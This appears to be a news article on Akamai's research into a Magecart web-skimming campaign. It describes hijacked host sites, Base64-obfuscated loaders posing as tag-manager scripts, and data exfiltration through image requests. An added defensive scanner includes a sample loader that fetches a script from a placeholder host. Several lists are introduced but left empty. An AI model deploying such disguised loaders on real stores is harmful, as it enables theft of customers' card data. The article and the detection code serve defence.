This strategy enables them to illicitly implant and conceal skimming malware within specific eCommerce websites.
In a Magecart attack, hackers breach online stores and implant malicious scripts designed to stealthily harvest customers’ credit card details and personal information during the checkout process.
According to Akamai’s researchers, who have been monitoring this campaign, numerous organizations in the following countries have been compromised:
In addition, the cybersecurity firm notes that many victims were unaware for more than a month that they had been compromised, which shows the covert nature of these attacks.
Web skimming attacks pose significant threats to organizations operating in the digital commerce realm, carrying the potential for substantial harm and adverse consequences.
The cybersecurity analysts at Akamai identified that the threat actors had exploited several major platforms, the most notable of which are:
A striking aspect of this campaign lies in the meticulous arrangement of the attackers’ infrastructure, specifically devised to orchestrate the web skimming campaign with remarkable efficacy.
In a strategic departure from conventional methods, instead of relying on their own command-and-control (C2) server, which could potentially raise suspicion as a malicious domain, the attackers adopt a different approach.
By exploiting vulnerabilities or employing any available means, they infiltrate susceptible and legitimate websites, particularly small or medium-sized retail platforms, where they covertly embed their malicious code.
At its core, this campaign has a dual impact, resulting in two distinct sets of victims:
During their investigation, Akamai researchers identified a limited selection of websites functioning as the primary targets, all of which exclusively pertained to commerce-oriented platforms.
Exploited host websites are used as hosts for malicious code and subjected to a Magecart-style web skimming attack, leading to the theft of user information.
The attack’s stealthiness is enhanced by threat actors obfuscating the skimmer with Base64 encoding, concealing the host’s URL, and structuring it to resemble trusted third-party services like Google Tag Manager or Facebook Pixel, minimizing suspicion.
Through this approach, the attacker implements three distinct techniques aimed at evading detection:
The domain employed in the attack is obfuscated, rendering it challenging to trace and identify.
The loader is disguised as an authentic third-party script or vendor, hiding its true malicious intent.
By sourcing a substantial portion of the code from alternative origins, the attacker minimizes the volume of injected malicious code on the page, significantly diminishing the likelihood of detection.
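One way a site owner could hunt for the first of these techniques, as an added example that is not from Akamai's research or the original article: it scans inline script text for Base64 string literals that decode to a URL and reports any whose host is not on an allowlist. The allowlist, function names and sample snippet are assumptions constructed for illustration; it runs under Node.js.

```javascript
// Hosts this site really loads third-party scripts from (assumed allowlist).
const ALLOWED_HOSTS = new Set(["www.googletagmanager.com", "connect.facebook.net"]);

// Quoted runs of the Base64 alphabet, 16+ characters, optional padding.
const B64_LITERAL = /["'`]([A-Za-z0-9+\/]{16,}={0,2})["'`]/g;

// Return a URL object if the literal decodes to printable text that is a URL.
function decodeIfUrl(b64) {
  const text = Buffer.from(b64, "base64").toString("latin1");
  if (!/^[\x20-\x7e]+$/.test(text)) return null; // binary data, not a hidden string
  const candidate = text.startsWith("//") ? "https:" + text : text; // protocol-relative
  if (!/^(https?|wss?):\/\//i.test(candidate)) return null;
  try { return new URL(candidate); } catch { return null; }
}

// Report every Base64 literal that hides a URL on a non-allowlisted host.
function findHiddenUrls(scriptSource, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const m of scriptSource.matchAll(B64_LITERAL)) {
    const url = decodeIfUrl(m[1]);
    if (url && !allowedHosts.has(url.hostname)) {
      findings.push({ literal: m[1], decoded: url.href, host: url.hostname, offset: m.index });
    }
  }
  return findings;
}

// Constructed sample: an inline snippet styled like a tag-manager loader whose
// real source is a Base64-encoded URL on a placeholder host.
const HIDDEN = Buffer.from("https://cdn.small-retailer.example/static/gtm.js").toString("base64");
const SAMPLE_INLINE = `(function(d,s,i){var j=d.createElement(s);j.async=true;
  j.src=atob("${HIDDEN}");d.head.appendChild(j);})(document,'script','GTM-XXXXXXX');`;

for (const f of findHiddenUrls(SAMPLE_INLINE)) {
  console.log(`offset ${f.offset}: literal decodes to ${f.decoded} (host ${f.host})`);
}
```

A hit is a lead for manual review rather than a verdict; a Content-Security-Policy `script-src` allowlist covers loaders that assemble the URL at runtime.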
The attacker uses obfuscation to impede debugging and research, deliberately making it difficult to understand the attack’s exact sequence, a practice widely adopted in various web skimming attacks that, in recent years, has become increasingly popular.
The first version is a highly obfuscated form that includes a customized list of CSS selectors specifically designed for each targeted site to capture customer PII and credit card information.
The second variant of the skimmer was less heavily protected, inadvertently revealing key indicators within its code.
These crucial clues allowed Akamai to effectively map the extent of the campaign’s impact and discover further victims.
Following the successful extraction of customers’ details, the skimmers transmit the stolen data to the server under the control of the threat actor.
This transmission is carried out through an HTTP request crafted as an IMG tag within the skimmer.
Base64 encoding is used to obfuscate the data during transmission. Website owners can prevent Magecart infections by securing admin accounts and updating their CMS and plugins, and customers can reduce their data exposure risk by using the following methods:
The recommendations are listed below: